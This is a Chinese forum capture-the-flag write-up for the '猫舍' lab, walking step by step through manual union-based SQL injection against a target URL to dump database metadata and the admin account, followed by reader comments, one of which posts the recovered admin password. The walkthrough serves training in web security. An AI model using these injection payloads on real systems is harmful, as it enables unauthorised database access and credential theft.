猫舍 writeup

Track-mss   ·   发表于 2019-01-30 16:39:04   ·   CTF&WP专版
目标url:http://117.41.229.122:8003/?id=1

第一步,判断是否存在sql注入漏洞
构造 ?id=1 and 1=1 ,回车


页面返回正常

构造 ?id=1 and 1=2 ,回车


页面不正常,初步判断这里 可能 存在一个注入漏洞


第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车


页面正常

构造 ?id=1 and 1=1 order by 2 回车


页面正常

构造 ?id=1 and 1=1 order by 3 回车


页面返回 错误,判断字段数为   2


第三步:判断回显点
构造 ?id=1 and 1=2 union select 1,2 回车


页面出现了  2  ,说明我们可以在数字  2  处显示我们想要的内容


第四步:查询相关内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车



查询当前数据库版本

构造 ?id=1 and 1=2 union select 1,version() 回车

查询当前数据库 表名
构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车

绝大数情况下,管理员的账号密码都在admin表里


查询字段名
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1 回车

构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 回车

构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1 回车


查出 admin 表里 有  id   username  password  三个字段


查询字段内容
构造 ?id=1 and 1=2 union select 1,username from admin  limit 0,1 回车


构造 ?id=1 and 1=2 union select 1,password from admin  limit 1,1 回车


limit 1,1 没有回显,说明只有一个用户

构造 ?id=1 and 1=2 union select 1,password from admin  limit 0,1 回车


得到管理员账号和密码


注:之前为了防止某些同学不思考直接复制内容,所以故意写错几个单词,没想到给各位同学带来困扰,深表歉意。

打赏我,让我更有动力~

29 Reply   |  Until 29天前 | 100606 View

shan
发表于 2020-9-3

..为啥我在加入union之后,很多时候会出现连接已重置的情况。。偶尔才能成功=-=是我这边网络的问题吗

评论列表

  • 加载数据中...

编写评论内容

xxzy28
发表于 2020-10-29

学习了

评论列表

  • 加载数据中...

编写评论内容

1203467131
发表于 2020-11-30

拿到账号密码怎么获得flag

评论列表

  • 加载数据中...

编写评论内容

qq1073518850
发表于 2020-11-30

flag: 对应是 Tips
第一题这个是: 获取管理员密码
输入错误的 可能是复制时候多了个空格

评论列表

  • 加载数据中...

编写评论内容

qwertyu9527
发表于 2020-12-25

到此一游!!

评论列表

  • 加载数据中...

编写评论内容

jack_loser
发表于 11个月前

为什么我打这一段?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()就可以出现当前数据库 表名
那么limit 0,1 回车这一段需不需要呀????

评论列表

  • 加载数据中...

编写评论内容

喜欢悠哉独自在
发表于 10个月前

database:maoshe(当前数据库名)
version:5.5.53(当前数据库版本)
table:admin(当前数据库的表名)
id username password
1 admin hellohack
2 ppt领取微信 zkaqbanban

评论列表

  • 加载数据中...

编写评论内容

liwen007
发表于 9个月前

sqlmap跑了,没用手工

评论列表

  • 加载数据中...

编写评论内容

31wangchang
发表于 29天前

如何知道这个是什么数据库

评论列表

  • 加载数据中...

编写评论内容
首页 1 2 / 2 跳转
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.